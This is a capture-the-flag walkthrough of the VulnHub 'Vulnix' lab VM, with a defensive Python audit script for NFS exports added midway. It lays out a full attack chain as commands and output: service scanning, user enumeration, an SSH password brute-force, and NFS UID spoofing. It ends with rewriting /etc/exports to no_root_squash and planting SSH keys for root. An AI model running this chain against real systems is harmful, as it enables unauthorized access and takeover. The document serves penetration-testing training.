VulnHub — Vulnix

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 10:cd:9e:a0:e4:e0:30:24:3e:bd:67:5f:75:4a:33:bf (DSA)
| 2048 bc:f9:24:07:2f:cb:76:80:0d:27:a6:48:52:0a:24:3a (RSA)
|_ 256 4d:bb:4a:c1:18:e8:da:d1:82:6f:58:52:9c:ee:34:5f (ECDSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: vulnix, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
|_ssl-date: 2019-10-16T11:55:10+00:00; -3s from scanner time.
79/tcp open finger Linux fingerd
|_finger: No one logged on.\x0D
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: SASL RESP-CODES TOP UIDL STLS PIPELINING CAPA
|_ssl-date: 2019-10-16T11:55:10+00:00; -3s from scanner time.
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100003 2,3,4 2049/udp nfs
| 100003 2,3,4 2049/udp6 nfs
| 100005 1,2,3 36626/tcp6 mountd
| 100005 1,2,3 43733/udp6 mountd
| 100005 1,2,3 46737/tcp mountd
| 100005 1,2,3 60829/udp mountd
| 100021 1,3,4 39481/udp nlockmgr
| 100021 1,3,4 39797/tcp6 nlockmgr
| 100021 1,3,4 40801/tcp nlockmgr
| 100021 1,3,4 46294/udp6 nlockmgr
| 100024 1 34603/udp status
| 100024 1 36114/tcp status
| 100024 1 49520/udp6 status
| 100024 1 51984/tcp6 status
| 100227 2,3 2049/tcp nfs_acl
| 100227 2,3 2049/tcp6 nfs_acl
| 100227 2,3 2049/udp nfs_acl
|_ 100227 2,3 2049/udp6 nfs_acl
143/tcp open imap Dovecot imapd
|_imap-capabilities: listed STARTTLS ENABLE capabilities LOGIN-REFERRALS have more IMAP4rev1 SASL-IR post-login Pre-login LOGINDISABLEDA0001 OK IDLE ID LITERAL+
|_ssl-date: 2019-10-16T11:55:11+00:00; -2s from scanner time.
512/tcp open exec netkit-rsh rexecd
513/tcp open login
514/tcp open shell Netkit rshd
993/tcp open ssl/imaps?
|_ssl-date: 2019-10-16T11:55:10+00:00; -3s from scanner time.
995/tcp open ssl/pop3s?
|_ssl-date: 2019-10-16T11:55:10+00:00; -3s from scanner time.
2049/tcp open nfs_acl 2-3 (RPC #100227)
36114/tcp open status 1 (RPC #100024)
40801/tcp open nlockmgr 1-4 (RPC #100021)
43232/tcp open mountd 1-3 (RPC #100005)
44143/tcp open mountd 1-3 (RPC #100005)
46737/tcp open mountd 1-3 (RPC #100005)
MAC Address: 08:00:27:E9:FD:8C (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Uptime guess: 198.842 days (since Sun Mar 31 21:14:34 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -2s, deviation: 0s, median: -3s
TRACEROUTE
HOP RTT ADDRESS
1 0.42 ms 10.0.0.20
NSE: Script Post-scanning.
Initiating NSE at 17:27
Completed NSE at 17:27, 0.00s elapsed
Initiating NSE at 17:27
Completed NSE at 17:27, 0.00s elapsed
Initiating NSE at 17:27
Completed NSE at 17:27, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 171.30 seconds
Raw packets sent: 65558 (2.885MB) | Rcvd: 65550 (2.623MB)
showmount -e 10.0.0.20
mount -t nfs 10.0.0.20:/home/vulnix /tmp/vulnix
smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -t 10.0.0.20
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------
Mode ………………… VRFY
Worker Processes ……… 5
Usernames file ……….. /usr/share/seclists/Usernames/top-usernames-shortlist.txt
Target count …………. 1
Username count ……….. 17
Target TCP port ………. 25
Query timeout ………… 5 secs
Target domain …………
######## Scan started at Wed Oct 16 22:06:40 2019 #########
10.0.0.20: root exists
10.0.0.20: user exists
######## Scan completed at Wed Oct 16 22:06:40 2019 #########
2 results.
17 queries in 1 seconds (17.0 queries / sec)
perl finger-user-enum.pl -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 10.0.0.20
 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------
Worker Processes ……… 5
Usernames file ……….. /usr/share/metasploit-framework/data/wordlists/unix_users.txt
Target count …………. 1
Username count ……….. 113
Target TCP port ………. 79
Query timeout ………… 5 secs
Relay Server …………. Not used
######## Scan started at Wed Oct 16 22:11:21 2019 #########
@10.0.0.20: No one logged on…
bin@10.0.0.20: Login: bin Name: bin..Directory: /bin Shell: /bin/sh..Never logged in…No mail…No Plan…
daemon@10.0.0.20: Login: daemon Name: daemon..Directory: /usr/sbin Shell: /bin/sh..Never logged in…No mail…No Plan…
backup@10.0.0.20: Login: backup Name: backup..Directory: /var/backups Shell: /bin/sh..Never logged in…No mail…No Plan…
games@10.0.0.20: Login: games Name: games..Directory: /usr/games Shell: /bin/sh..Never logged in…No mail…No Plan…
gnats@10.0.0.20: Login: gnats Name: Gnats Bug-Reporting System (admin)..Directory: /var/lib/gnats Shell: /bin/sh..Never logged in…No mail…No Plan…
irc@10.0.0.20: Login: irc Name: ircd..Directory: /var/run/ircd Shell: /bin/sh..Never logged in…No mail…No Plan…
list@10.0.0.20: Login: list Name: Mailing List Manager..Directory: /var/list Shell: /bin/sh..Never logged in…No mail…No Plan…
lp@10.0.0.20: Login: lp Name: lp..Directory: /var/spool/lpd Shell: /bin/sh..Never logged in…No mail…No Plan…
libuuid@10.0.0.20: Login: libuuid Name: ..Directory: /var/lib/libuuid Shell: /bin/sh..Never logged in…No mail…No Plan…
mail@10.0.0.20: Login: mail Name: mail..Directory: /var/mail Shell: /bin/sh..Never logged in…No mail…No Plan…..Login: dovecot Name: Dovecot mail server..Directory: /usr/lib/dovecot Shell: /bin/false..Never logged in…No mail…No Plan…
messagebus@10.0.0.20: Login: messagebus Name: ..Directory: /var/run/dbus Shell: /bin/false..Never logged in…No mail…No Plan…
news@10.0.0.20: Login: news Name: news..Directory: /var/spool/news Shell: /bin/sh..Never logged in…No mail…No Plan…
nobody@10.0.0.20: Login: nobody Name: nobody..Directory: /nonexistent Shell: /bin/sh..Never logged in…New mail received Wed Oct 16 12:47 2019 (BST).. Unread since Thu Oct 3 14:02 2019 (BST)..No Plan…
man@10.0.0.20: Login: man Name: man..Directory: /var/cache/man Shell: /bin/sh..Never logged in…No mail…No Plan…
proxy@10.0.0.20: Login: proxy Name: proxy..Directory: /bin Shell: /bin/sh..Never logged in…No mail…No Plan…
root@10.0.0.20: Login: root Name: root..Directory: /root Shell: /bin/bash..Never logged in…No mail…No Plan…
sshd@10.0.0.20: Login: sshd Name: ..Directory: /var/run/sshd Shell: /usr/sbin/nologin..Never logged in…No mail…No Plan…
sync@10.0.0.20: Login: sync Name: sync..Directory: /bin Shell: /bin/sync..Never logged in…No mail…No Plan…
sys@10.0.0.20: Login: sys Name: sys..Directory: /dev Shell: /bin/sh..Never logged in…No mail…No Plan…
syslog@10.0.0.20: Login: syslog Name: ..Directory: /home/syslog Shell: /bin/false..Never logged in…No mail…No Plan…
uucp@10.0.0.20: Login: uucp Name: uucp..Directory: /var/spool/uucp Shell: /bin/sh..Never logged in…No mail…No Plan…
user@10.0.0.20: Login: user Name: user..Directory: /home/user Shell: /bin/bash..Last login Wed Oct 16 12:21 (BST) on pts/0 from 10.0.0.1..No mail…No Plan…..Login: dovenull Name: Dovecot login user..Directory: /nonexistent Shell: /bin/false..Never logged in…No mail…No Plan…
www-data@10.0.0.20: Login: www-data Name: www-data..Directory: /var/www Shell: /bin/sh..Never logged in…No mail…No Plan…
######## Scan completed at Wed Oct 16 22:11:21 2019 #########
24 results.
113 queries in 1 seconds (113.0 queries / sec)
hydra -l user -P /usr/share/wordlists/rockyou.txt 10.0.0.20 ssh
ssh user@10.0.0.20
Using the password letmein, we got SSH access.
adduser vulnix, then vim /etc/passwd and change the vulnix UID and GID to 2008. I changed it manually using vim /etc/passwd and edited the vulnix UID and GID:
vulnix:x:2008:2008:,,,:/home/vulnix:/bin/bash
└──╼ #su vulnix
vulnix@PREDATOR:/root/predator/oscp/vulnhub/vulnix$ cd /tmp/
vulnix@PREDATOR:/tmp$ cd vulnix/
vulnix@PREDATOR:/tmp/vulnix$ ls -la
total 60
drwxr-x--- 5 vulnix vulnix 4096 Oct 16 17:11 .
drwxrwxrwt 20 root root 20480 Oct 16 21:58 ..
-rw------- 1 vulnix vulnix 905 Oct 3 18:58 .bash_history
-rw-r--r-- 1 vulnix vulnix 220 Apr 3 2012 .bash_logout
-rw-r--r-- 1 vulnix vulnix 3486 Apr 3 2012 .bashrc
drwx------ 2 vulnix vulnix 4096 Oct 3 18:30 .cache
-rw-r--r-- 1 vulnix vulnix 675 Apr 3 2012 .profile
drwxr-xr-x 2 vulnix vulnix 4096 Oct 3 18:30 .ssh
drwxr-xr-x 2 vulnix vulnix 4096 Oct 3 18:26 ssh
-rw-rw-r-- 1 vulnix vulnix 8 Oct 16 17:11 sudoedit
vulnix@PREDATOR:/tmp/vulnix$
#NOTE :- leave the password option empty for easy use
└──╼ #ssh-keygen -f anythin
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in anythin.
Your public key has been saved in anythin.pub.
The key fingerprint is:
SHA256:GdD4S+KLFywZ13ePgO5zHtXXZQ9/16LYqpOk7Jmo8d8 root@PREDATOR
The key’s randomart image is:
+---[RSA 3072]----+
| .o |
| … |
| o.. . o|
| . o =oo .. +=|
| * +So o.oo O|
| o + + +…oo|
| . + * .o o |
| o..=+= .o |
| ..o+= E*o |
+----[SHA256]-----+
┌─[root@PREDATOR]─[~/predator/oscp/vulnhub/vulnix/ssh]
└──╼ #ls -la
total 16
drwxr-xr-x 2 root root 4096 Oct 16 22:38 .
drwxr-xr-x 4 root root 4096 Oct 16 22:37 ..
-rw------- 1 root root 2602 Oct 16 22:38 anythin
-rw-r--r-- 1 root root 567 Oct 16 22:38 anythin.pub
vulnix@PREDATOR:/tmp/vulnix/.ssh$ echo "ssh-rsa <public key body from anythin.pub>" > authorized_keys
┌─[root@PREDATOR]─[~/predator/oscp/vulnhub/vulnix]
└──╼ #ssh -i anythin vulnix@10.0.0.20
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)
* Documentation: https://help.ubuntu.com/
System information as of Wed Oct 16 13:51:20 BST 2019
System load: 0.01 Processes: 103
Usage of /: 92.0% of 773MB Users logged in: 1
Memory usage: 11% IP address for eth0: 10.0.0.20
Swap usage: 0%
=> / is using 92.0% of 773MB
Graph this data and manage this system at https://landscape.canonical.com/
Last login: Wed Oct 16 12:38:57 2019 from 10.0.0.1
vulnix@vulnix:~$ id
uid=2008(vulnix) gid=2008(vulnix) groups=2008(vulnix)
vulnix@vulnix:~$
vulnix@vulnix:~$ sudo -l
Matching ‘Defaults’ entries for vulnix on this host:
env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User vulnix may run the following commands on this host:
(root) sudoedit /etc/exports, (root) NOPASSWD: sudoedit /etc/exports
vulnix@vulnix:~$
chmod: changing permissions of `/bin/bash’: Operation not permitted
# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check)
#
/home/vulnix *(rw,root_squash)
/root *(rw,no_root_squash)

NOTE: press Ctrl+O to save the file
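The access gained in this walkthrough depends on what the exports file above allows: a `*` client with the default AUTH_SYS flavor trusts whatever UID the client presents (here 2008), and `no_root_squash` on `/root` maps client root to server root. As an added example that is not part of the original writeup, a small Python audit that flags those conditions in an exports file; the function name `audit_exports` and the finding strings are assumptions of this example.

```python
import re

# Constructed sample: the two active entries from the /etc/exports shown above.
SAMPLE_EXPORTS = """\
# /etc/exports: the access control list for filesystems which may be exported
/home/vulnix *(rw,root_squash)
/root *(rw,no_root_squash)
"""

# One client spec: optional host/pattern followed by optional "(opt,opt,...)".
CLIENT_RE = re.compile(r"^(?P<host>[^()\s]*)(?:\((?P<opts>[^)]*)\))?$")


def audit_exports(text):
    """Return (path, client, finding) tuples for risky entries in exports(5) text."""
    findings = []
    # exports(5) allows backslash-newline continuation; join those lines first.
    for raw in text.replace("\\\n", " ").splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, *clients = line.split()
        for spec in clients or [""]:  # no client listed means "everyone"
            m = CLIENT_RE.match(spec)
            if not m:
                findings.append((path, spec, "unparseable client spec"))
                continue
            host = m.group("host") or "*"
            opts = {o.strip() for o in (m.group("opts") or "").split(",") if o.strip()}
            # Default security flavor is AUTH_SYS ("sys"): the client asserts its own UID.
            flavors = next((o[4:].split(":") for o in opts if o.startswith("sec=")), ["sys"])
            if "no_root_squash" in opts:
                findings.append((path, host, "no_root_squash: client root is server root"))
            if host == "*":
                findings.append((path, host, "wildcard client: any host may mount"))
            if "rw" in opts and "sys" in flavors and "all_squash" not in opts:
                findings.append((path, host, "rw over AUTH_SYS: client-asserted UIDs are trusted"))
    return findings


if __name__ == "__main__":
    for path, client, finding in audit_exports(SAMPLE_EXPORTS):
        print(f"{path} [{client}] {finding}")
```

An entry restricted to a named client with `sec=krb5p` produces no findings, which is the shape a hardened home-directory export would take.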
└──╼ #showmount -e 10.0.0.20
Export list for 10.0.0.20:
/root *
/home/vulnix *
mount -t nfs 10.0.0.20:/root /tmp/root
┌─[root@PREDATOR]─[~/predator/oscp/vulnhub/vulnix]
└──╼ #cd /tmp/root/
┌─[root@PREDATOR]─[/tmp/root]
└──╼ #ls -la
total 48
drwx------ 3 root root 4096 Sep 3 2012 .
drwxrwxrwt 20 root root 20480 Oct 16 21:58 ..
-rw------- 1 root root 0 Sep 3 2012 .bash_history
-rw-r--r-- 1 root root 3106 Apr 19 2012 .bashrc
drwx------ 2 root root 4096 Sep 2 2012 .cache
-rw-r--r-- 1 root root 140 Apr 19 2012 .profile
-r-------- 1 root root 33 Sep 2 2012 trophy.txt
-rw------- 1 root root 710 Sep 2 2012 .viminfo
┌─[root@PREDATOR]─[/tmp/root]
└──╼ #
mkdir .ssh
cd .ssh
echo "ssh-rsa <public key body from anythin.pub>" > authorized_keys
┌─[root@PREDATOR]─[~/predator/oscp/vulnhub/vulnix]
└──╼ #ssh -i anything root@10.0.0.20
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)
* Documentation: https://help.ubuntu.com/
System information as of Wed Oct 16 14:09:08 BST 2019
System load: 0.03 Processes: 97
Usage of /: 92.1% of 773MB Users logged in: 1
Memory usage: 11% IP address for eth0: 10.0.0.20
Swap usage: 0%
=> / is using 92.1% of 773MB
Graph this data and manage this system at https://landscape.canonical.com/
Last login: Wed Oct 16 14:05:36 2019 from 10.0.0.1
root@vulnix:~# id
uid=0(root) gid=0(root) groups=0(root)

root@vulnix:~# ls
trophy.txt
root@vulnix:~#
